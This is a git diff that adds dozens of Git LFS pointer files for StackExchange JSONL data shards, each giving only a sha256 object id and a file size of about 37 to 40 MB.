-0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:861b63a24c4fed5bc77aab47479ce573bf827a78dd4881c1fdc7328b50af1ab4 +size 39670467 diff --git a/data/stackexchange/1-1/2199_2289.jsonl b/data/stackexchange/1-1/2199_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..723365846f1a7c6238d2778bf27b0bc25378a54c --- /dev/null +++ b/data/stackexchange/1-1/2199_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1bf1b92ae316292698e26f6dabf0805e8579e653745da580ea89c9566799533 +size 39325684 diff --git a/data/stackexchange/1-1/219_2289.jsonl b/data/stackexchange/1-1/219_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4538c69e06b3969bb0184b664117c019b41e7877 --- /dev/null +++ b/data/stackexchange/1-1/219_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8aea7c5d3a87c67487585736a9a716b304306ef2367e71b82e9dd8c8c3866c30 +size 38270821 diff --git a/data/stackexchange/1-1/21_2289.jsonl b/data/stackexchange/1-1/21_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aab5011fa61110191a417dd741c225eb2a2540d8 --- /dev/null +++ b/data/stackexchange/1-1/21_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a3c0e8b44a0f0cb877c2dfc9d5e5ee1cbe110ae157b04997ec3e2e19c567286 +size 35747304 diff --git a/data/stackexchange/1-1/2200_2289.jsonl b/data/stackexchange/1-1/2200_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..8c83c9946c861f4f62bcfa000f2ec31e925456e3 --- /dev/null +++ b/data/stackexchange/1-1/2200_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b7636e694a3a781b5d0cc416009e407034a6fb37d11d729375e4ab5d1528dff +size 39863995 diff --git a/data/stackexchange/1-1/2201_2289.jsonl b/data/stackexchange/1-1/2201_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95ba7cde2b15538c5b3e6abee9f47a00b8773680 --- /dev/null +++ b/data/stackexchange/1-1/2201_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2224277b306e964516bbe73c98a4440afde0b58bb69cf4289bcf0f85e00dedef +size 39545188 diff --git a/data/stackexchange/1-1/2202_2289.jsonl b/data/stackexchange/1-1/2202_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3bad02522eac69be3c49687bf8e3bacd8601973a --- /dev/null +++ b/data/stackexchange/1-1/2202_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19ca17c9dc1a856aa2514e2118bb12b9988f3d67ca04115b2cd6483249d3b503 +size 39313004 diff --git a/data/stackexchange/1-1/2203_2289.jsonl b/data/stackexchange/1-1/2203_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ad1580c16aa4167cbbbe01e48f0f07ff678dffe --- /dev/null +++ b/data/stackexchange/1-1/2203_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cded776bc1478a68c71bb821d15e95a04155605d64357aa07afbc0a9ccb72898 +size 39794539 diff --git a/data/stackexchange/1-1/2204_2289.jsonl b/data/stackexchange/1-1/2204_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eab68b3b35478442a716ca220e98f1e24f1a9117 --- /dev/null +++ b/data/stackexchange/1-1/2204_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:55197cb6b1b8d5861d330fc3ca7ddceee125b7a031708b21011a7541e4c364f3 +size 39322307 diff --git a/data/stackexchange/1-1/2205_2289.jsonl b/data/stackexchange/1-1/2205_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..49f8043789ae3b26fd0bf1473dde53b2eca8dbe8 --- /dev/null +++ b/data/stackexchange/1-1/2205_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9c96eaf29c25ddb39e330ad2150f25603d3024165cb6ddc81b22143a4f1f809 +size 39558163 diff --git a/data/stackexchange/1-1/2206_2289.jsonl b/data/stackexchange/1-1/2206_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a35812dd8c9e5844ec72c20323d8c90374b8841 --- /dev/null +++ b/data/stackexchange/1-1/2206_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3926d1de4982055b2571da857f7fd8a4c5b90db9156af0ea9535edaa40bcb088 +size 39515147 diff --git a/data/stackexchange/1-1/2207_2289.jsonl b/data/stackexchange/1-1/2207_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bd8313e4505e876f0dc7a8096fe0992ddf5c698d --- /dev/null +++ b/data/stackexchange/1-1/2207_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03061b298a8d6244f1aea68d72b0f408fd8fd7a9ed4eb09be6ecdd1da0930bd2 +size 39298733 diff --git a/data/stackexchange/1-1/2208_2289.jsonl b/data/stackexchange/1-1/2208_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..680dcfdd5b176ca264b4ee2d3757cb664add66b4 --- /dev/null +++ b/data/stackexchange/1-1/2208_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:7f86d7d12d930bb2f681465ad5ebfde905ec32239386e9f8a5b5453f3ed88467 +size 40003814 diff --git a/data/stackexchange/1-1/2209_2289.jsonl b/data/stackexchange/1-1/2209_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32d0d74013629270cafbdb816ada177895c15b23 --- /dev/null +++ b/data/stackexchange/1-1/2209_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:844f892a02f40e565fec21e4d607ff5c16e0546a23ca725eb0ff1b7c3cce6685 +size 39756774 diff --git a/data/stackexchange/1-1/220_2289.jsonl b/data/stackexchange/1-1/220_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..853b8012d8cf2dbf08115655a133db74447f9d91 --- /dev/null +++ b/data/stackexchange/1-1/220_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03aeabceea36ec9584097c4d25d9710981fb0fe8d4035404da5e10637d3e6722 +size 37644563 diff --git a/data/stackexchange/1-1/2210_2289.jsonl b/data/stackexchange/1-1/2210_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9d9ff51ebd646a672b77ac23a7eb5e1b857cc699 --- /dev/null +++ b/data/stackexchange/1-1/2210_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:edf2fb99417ea5fceeca073279e89c9788b81664959428cb7137ed943cc22cdc +size 39883086 diff --git a/data/stackexchange/1-1/2211_2289.jsonl b/data/stackexchange/1-1/2211_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7f5b0b3e2af7618f844765bc2b318f3241eb8631 --- /dev/null +++ b/data/stackexchange/1-1/2211_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b1fc764e34ecd7c756280ae089607a4e6d75eceaa1dc7747bb736102fe18a956 +size 39780737 diff --git a/data/stackexchange/1-1/2212_2289.jsonl b/data/stackexchange/1-1/2212_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad85fec3dd12bf3ad6d03a02b544b60346d5e76d --- /dev/null +++ b/data/stackexchange/1-1/2212_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09891bf332f25c1ed0d6456947f1b579333e676a5b8697e2e03fa7a7a4e80390 +size 39145004 diff --git a/data/stackexchange/1-1/2213_2289.jsonl b/data/stackexchange/1-1/2213_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d6b6514cb9507df9eb564d81af79542362bcef65 --- /dev/null +++ b/data/stackexchange/1-1/2213_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64bf552d70038c9c8e96f255b7cf50f72682edcd68a0459cb487993f1bb4ac76 +size 39648904 diff --git a/data/stackexchange/1-1/2214_2289.jsonl b/data/stackexchange/1-1/2214_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..552340b8df19d88d4062b57b4f20b226eda384b5 --- /dev/null +++ b/data/stackexchange/1-1/2214_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8dbbcec51cd6294f6f8d284f3227bc160553772d341906243120ad3427ba1aa1 +size 39241361 diff --git a/data/stackexchange/1-1/2215_2289.jsonl b/data/stackexchange/1-1/2215_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12e23d18ee7f77ac07005ac0311f1e5753c54be2 --- /dev/null +++ b/data/stackexchange/1-1/2215_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e51e316af5ef68dfc61b87ad20e2c62baae12989fdf73f0c9cbbe53e1475c17b +size 39969566 diff --git a/data/stackexchange/1-1/2216_2289.jsonl b/data/stackexchange/1-1/2216_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..54b71fea1ef0b0c7057eb495edd0418e5b04f880 --- /dev/null +++ b/data/stackexchange/1-1/2216_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:962ac9543ea0b8466ca2be9b7c6865d1bdf3f1243125c08abc61cba3e98dc750 +size 39527426 diff --git a/data/stackexchange/1-1/2217_2289.jsonl b/data/stackexchange/1-1/2217_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..39c726571b08b1607266c4f755353a3a8f11764e --- /dev/null +++ b/data/stackexchange/1-1/2217_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:34be745bf988188a5eb912a45b4237b192b3471f139f7d4a8d5800f10dcb63af +size 39684938 diff --git a/data/stackexchange/1-1/2218_2289.jsonl b/data/stackexchange/1-1/2218_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c5e227d2cc0a97a88a3aead36c1014a78263276 --- /dev/null +++ b/data/stackexchange/1-1/2218_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3014776eacece5ae3af14a7e18fa06fc55e602c62f9c90a3b54ee3a35e555e0d +size 39293533 diff --git a/data/stackexchange/1-1/2219_2289.jsonl b/data/stackexchange/1-1/2219_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..790aa47b185835fdf1cfa25bfec6264bc16963d6 --- /dev/null +++ b/data/stackexchange/1-1/2219_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6bb3184cec0da43087e434f73d6b136df1756bea7b4e509292185ab3158b9f35 +size 40154396 diff --git a/data/stackexchange/1-1/221_2289.jsonl b/data/stackexchange/1-1/221_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c496be9d662fbbab535c6b88a11f56b9f13576b --- /dev/null +++ b/data/stackexchange/1-1/221_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba83066d8ddeec55f6d463dff26d8c7e53dac1afaa9984c3c1c06a3f5ee3baa6 +size 38086761 diff --git a/data/stackexchange/1-1/2220_2289.jsonl b/data/stackexchange/1-1/2220_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c92911604ecfd50f53a7f2be3496cf8d7073e69c --- /dev/null +++ b/data/stackexchange/1-1/2220_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4fc7947c7f4bad4ba155a54c8ae89b785b2b1eeb10299aa392fe88ad1353d848 +size 39729998 diff --git a/data/stackexchange/1-1/2221_2289.jsonl b/data/stackexchange/1-1/2221_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0b5ef24e0640b78dad6b871425aa0f0cf975751 --- /dev/null +++ b/data/stackexchange/1-1/2221_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:638d59e3bb8a4ad82837845683145f12b7e1105ba735f661641e9f729e2a9b7f +size 39591620 diff --git a/data/stackexchange/1-1/2222_2289.jsonl b/data/stackexchange/1-1/2222_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..739dcb7bde04ae985ce6b394a431a66d01a3b42a --- /dev/null +++ b/data/stackexchange/1-1/2222_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7594473f944de56b691d158ea149752e66088745f722e335b4160b1f9b5c906a +size 39410068 diff --git a/data/stackexchange/1-1/2223_2289.jsonl b/data/stackexchange/1-1/2223_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12ccc3a342de10322a8cfa7d4fe6f169c062d55d --- /dev/null +++ b/data/stackexchange/1-1/2223_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:87ace75243d01de34d79a1ceeb96c76825371f63bd6938d72b6312e63ad88500 +size 39786169 diff --git a/data/stackexchange/1-1/2224_2289.jsonl b/data/stackexchange/1-1/2224_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2696cdb5fc6342f285a85c23cafc1e97d3ce5c71 --- /dev/null +++ b/data/stackexchange/1-1/2224_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2df35213f5818a310ad544257e103865dd5e06649acbe760ea377b6bf5085bc2 +size 39161713 diff --git a/data/stackexchange/1-1/2225_2289.jsonl b/data/stackexchange/1-1/2225_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b83690925e05b7c3094627cae9e7b2a9ef5526de --- /dev/null +++ b/data/stackexchange/1-1/2225_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b2f3d352c771a78b9d938192fda49cf57dec190bd230452adbe9af200e0faa6 +size 40150785 diff --git a/data/stackexchange/1-1/2226_2289.jsonl b/data/stackexchange/1-1/2226_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3dd5afb519f9d6107310f37dff6d1d510325cbe2 --- /dev/null +++ b/data/stackexchange/1-1/2226_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c67736027fa4107252831a4392123e9689ded3b242cf89e2cd01d0844bc2050a +size 39638768 diff --git a/data/stackexchange/1-1/2227_2289.jsonl b/data/stackexchange/1-1/2227_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19832a519a87c0a465d2931e02ec09e4354c7676 --- /dev/null +++ b/data/stackexchange/1-1/2227_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2adf6a280c3afa43bd896c25472f7e3029fbe7791df79422e6126fb04d0fff7 +size 40090795 diff --git a/data/stackexchange/1-1/2228_2289.jsonl b/data/stackexchange/1-1/2228_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aac14fa25eff644f0dc577bd90e45cc68cc283fa --- /dev/null +++ b/data/stackexchange/1-1/2228_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7008f4a6e2022fbc2755f71a62a7cd98a7ab169f3623a37ff635e9013f89604d +size 39653151 diff --git a/data/stackexchange/1-1/2229_2289.jsonl b/data/stackexchange/1-1/2229_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..88a062140373a9bd960c34b67ab5152576a5cbc2 --- /dev/null +++ b/data/stackexchange/1-1/2229_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2932a3c008ba781b6ae4998c50d35c0f665de0a15a8ff45767d3a051b9327318 +size 39920676 diff --git a/data/stackexchange/1-1/222_2289.jsonl b/data/stackexchange/1-1/222_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69d82d17d3c14ffbfd6dbccd1bc9b0f1a257fd77 --- /dev/null +++ b/data/stackexchange/1-1/222_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:348ffb5aabe11262acc9fc2b80dd9eb92ecf64711ae98df7c852406d6da9dd64 +size 39102445 diff --git a/data/stackexchange/1-1/2230_2289.jsonl b/data/stackexchange/1-1/2230_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..90944b5c6d6b2549421dcc5c77b279d317782a7f --- /dev/null +++ b/data/stackexchange/1-1/2230_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e1e3bdbe191a9aa6b666002136d197fd62359b837831a35f0425d75257b2c583 +size 39741309 diff --git a/data/stackexchange/1-1/2231_2289.jsonl b/data/stackexchange/1-1/2231_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..4e63eaf6c22586607eee654eecf30edfa945b3fd --- /dev/null +++ b/data/stackexchange/1-1/2231_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aee8f8d5049a0c7d66867396c3ec021cb98ad808e467f0eb659290005f5b8b98 +size 40176170 diff --git a/data/stackexchange/1-1/2232_2289.jsonl b/data/stackexchange/1-1/2232_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4969c33a040ec33d2b02b329042fda20726d02cd --- /dev/null +++ b/data/stackexchange/1-1/2232_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f2297edbdf5acf88cb3711f7e708712360853cdc06e3bb6d950d6f65a6bcfaeb +size 40002862 diff --git a/data/stackexchange/1-1/2233_2289.jsonl b/data/stackexchange/1-1/2233_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f23931f86ab77194a22b5f7e27da0b3ac4555b86 --- /dev/null +++ b/data/stackexchange/1-1/2233_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a011e3c54be5b39bcec0755adde21c5fdbc6cffb87c0f4e9c4e5b1a40176720 +size 39187476 diff --git a/data/stackexchange/1-1/2234_2289.jsonl b/data/stackexchange/1-1/2234_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa4c5262a906078fec394d45238fbf4daf986654 --- /dev/null +++ b/data/stackexchange/1-1/2234_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8999a5fa0cb2bd2e6fe8a49de8e77c6c5c370097203562a66f42c9ea517c1186 +size 39276079 diff --git a/data/stackexchange/1-1/2235_2289.jsonl b/data/stackexchange/1-1/2235_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b8122bf7036ee38b2448861a91457df04f26fe98 --- /dev/null +++ b/data/stackexchange/1-1/2235_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8adc1b22f2204bb50422a2c3ac9dce23adedf93172dd08250f9a5394f776f286 +size 40341592 diff --git a/data/stackexchange/1-1/2236_2289.jsonl b/data/stackexchange/1-1/2236_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..35880ad9983408bec292f25e5e4320b1dcc5e944 --- /dev/null +++ b/data/stackexchange/1-1/2236_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:39eab767ba3fa56f1f6b01e546f56a267ece986dd954b690416ee3176be2813d +size 39762391 diff --git a/data/stackexchange/1-1/2237_2289.jsonl b/data/stackexchange/1-1/2237_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd937f8a0f410d701e33615b2c9588c9438c686d --- /dev/null +++ b/data/stackexchange/1-1/2237_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71363a850b59b882b78145b9b5b2ae517e2237d819f8d8648fd4f696595d54ef +size 39676045 diff --git a/data/stackexchange/1-1/2238_2289.jsonl b/data/stackexchange/1-1/2238_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67f10fb7fdcff7d20b48ae28b7f0bf35efaf115b --- /dev/null +++ b/data/stackexchange/1-1/2238_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5959564c5d720b057b93a222c9d0ce60e10976959607bb3165278c7ace8cc4a +size 39491587 diff --git a/data/stackexchange/1-1/2239_2289.jsonl b/data/stackexchange/1-1/2239_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eff33b7ab16ffcdbbda72fa63e7edf9b807471f6 --- /dev/null +++ b/data/stackexchange/1-1/2239_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:734cac33ebca86d36e44410867f8af08488412ec1dd4ae39c1996838680ce910 +size 37361549 diff --git a/data/stackexchange/1-1/223_2289.jsonl b/data/stackexchange/1-1/223_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1f0cb8ff6b9eb5be476e1a8b49b01751dd556e26 --- /dev/null +++ b/data/stackexchange/1-1/223_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f87740466a0795c48872809a41048b2ee23b742e95680d62c00998d96ea7c6b +size 38235602 diff --git a/data/stackexchange/1-1/2240_2289.jsonl b/data/stackexchange/1-1/2240_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed18bfed588bb2b34f13cb960ade5faf201dbea3 --- /dev/null +++ b/data/stackexchange/1-1/2240_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bca2b6ee7bd87725c2f8167ac4f4e96ba8af756766231b0fd302f7b9d64ab566 +size 37097820 diff --git a/data/stackexchange/1-1/2241_2289.jsonl b/data/stackexchange/1-1/2241_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0c70acc403861671617991f4c34d41510d33eb6 --- /dev/null +++ b/data/stackexchange/1-1/2241_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5243694bcc6e95c71565e083e04fb6ee31e024b0b3ce8b974370f851ab22379 +size 37885817 diff --git a/data/stackexchange/1-1/2242_2289.jsonl b/data/stackexchange/1-1/2242_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bfd6bac2730c9410a23918ea489e9f67e46f14df --- /dev/null +++ b/data/stackexchange/1-1/2242_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7b26dd543676ec58f5f68d554fafaf0c7c5ef5aa52fc9fbe9e1915bf6e410fae +size 37272140 diff --git a/data/stackexchange/1-1/2243_2289.jsonl b/data/stackexchange/1-1/2243_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c5d1e0b6645980ca282054797250610bd52c915c --- /dev/null +++ b/data/stackexchange/1-1/2243_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95627253c96d15aa53bbeb391ebdc2bfef353d6d6fb69f15239009da374da4e7 +size 37796979 diff --git a/data/stackexchange/1-1/2244_2289.jsonl b/data/stackexchange/1-1/2244_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d091a505926b21707579ab6653cc0a9e45efa48c --- /dev/null +++ b/data/stackexchange/1-1/2244_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4bc413b0a37c4d83181c9b4f61b58deac321bf6531502ede7528d5db2f36dce +size 37339596 diff --git a/data/stackexchange/1-1/2245_2289.jsonl b/data/stackexchange/1-1/2245_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..24b51c9bb83a262df3daf16a0c30a25456611102 --- /dev/null +++ b/data/stackexchange/1-1/2245_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8931c5ccc59298c05eaa226999cb320f02be8e6fe6daf0c41cf5630ff564ce4 +size 38052724 diff --git a/data/stackexchange/1-1/2246_2289.jsonl b/data/stackexchange/1-1/2246_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..851527019e1c77118ea0fa31bad1e8ef138394f1 --- /dev/null +++ b/data/stackexchange/1-1/2246_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3dcd7fede914c77f382708bd8eeb36ee8c5ed195b2e458038e132478e7260dc8 +size 37577992 diff --git a/data/stackexchange/1-1/2247_2289.jsonl b/data/stackexchange/1-1/2247_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..1ebfa58b8d4e7229a617855535d44b9f849e5418 --- /dev/null +++ b/data/stackexchange/1-1/2247_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65681c6068e8a3638e954e7461c83e202d6f46589c8c21a881d4ff78e4d1ccce +size 37316612 diff --git a/data/stackexchange/1-1/2248_2289.jsonl b/data/stackexchange/1-1/2248_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..99f6a5b9c03ae57717af33844b5a2f128bfbc8f6 --- /dev/null +++ b/data/stackexchange/1-1/2248_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f5896fcd7d3305334182dccbee797061112fa5595ebfddd8bfb5302973f5083 +size 38024718 diff --git a/data/stackexchange/1-1/2249_2289.jsonl b/data/stackexchange/1-1/2249_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fa15d951bd6ced35b51dcc1de8675d2d899a2e95 --- /dev/null +++ b/data/stackexchange/1-1/2249_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1c15d559d572eefc658c5e105c51488dc24cd8c03ef73a528be705d2e933eff8 +size 37438852 diff --git a/data/stackexchange/1-1/224_2289.jsonl b/data/stackexchange/1-1/224_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..080f835a8caf25c7276d495d61842e29d3abbe2c --- /dev/null +++ b/data/stackexchange/1-1/224_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3efc3caf591d9a3237e8f42670da98fea7d34807751ced788bf2adc7bc9098c6 +size 37342072 diff --git a/data/stackexchange/1-1/2250_2289.jsonl b/data/stackexchange/1-1/2250_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..50697ac0b165f67936db6b708bad7534163b09b9 --- /dev/null +++ b/data/stackexchange/1-1/2250_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:59b38160460b71ac54a103aadcdc90891084b47e1f0f81dec610d8f07ce91c19 +size 37346379 diff --git a/data/stackexchange/1-1/2251_2289.jsonl b/data/stackexchange/1-1/2251_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..060eb2ee405eafcc4877281052c8f5ae942a37ab --- /dev/null +++ b/data/stackexchange/1-1/2251_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:794a955b254ea9829e7f5141ad17c0f89a1186f79e51f6524f0eb9ff91bbcece +size 37960503 diff --git a/data/stackexchange/1-1/2252_2289.jsonl b/data/stackexchange/1-1/2252_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ca3f9a23ce0bb88cdb4615786850d8ecad49800 --- /dev/null +++ b/data/stackexchange/1-1/2252_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d833d8681bcc9989ab8923a5cfce706d8ca4d2a5c1401e3a1d69150c756626b +size 37012196 diff --git a/data/stackexchange/1-1/2253_2289.jsonl b/data/stackexchange/1-1/2253_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..488fc0cde4f3fd21fb868f36851d097e7a1d10a4 --- /dev/null +++ b/data/stackexchange/1-1/2253_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7f61f5cba25f4df129be7b505a8a84737051575ab5f0ba0dc98f415455ae303 +size 37616875 diff --git a/data/stackexchange/1-1/2254_2289.jsonl b/data/stackexchange/1-1/2254_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d1c72a44d980a0920a1c813c627d4f9bc79389e8 --- /dev/null +++ b/data/stackexchange/1-1/2254_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:fe2678a5576ce98c877294378a9bc6042bae82faaa31709deae3e667cf230bce +size 37847573 diff --git a/data/stackexchange/1-1/2255_2289.jsonl b/data/stackexchange/1-1/2255_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa619b0c60a3451b5253e4881f686c05682e81f8 --- /dev/null +++ b/data/stackexchange/1-1/2255_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e197be897b3b97e22983a8d4378a00b5ffa4f3a8fbe1d2524a295b4db301a861 +size 37815569 diff --git a/data/stackexchange/1-1/2256_2289.jsonl b/data/stackexchange/1-1/2256_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c954fc611e3c7ae234501aa06014e45cb63333a --- /dev/null +++ b/data/stackexchange/1-1/2256_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 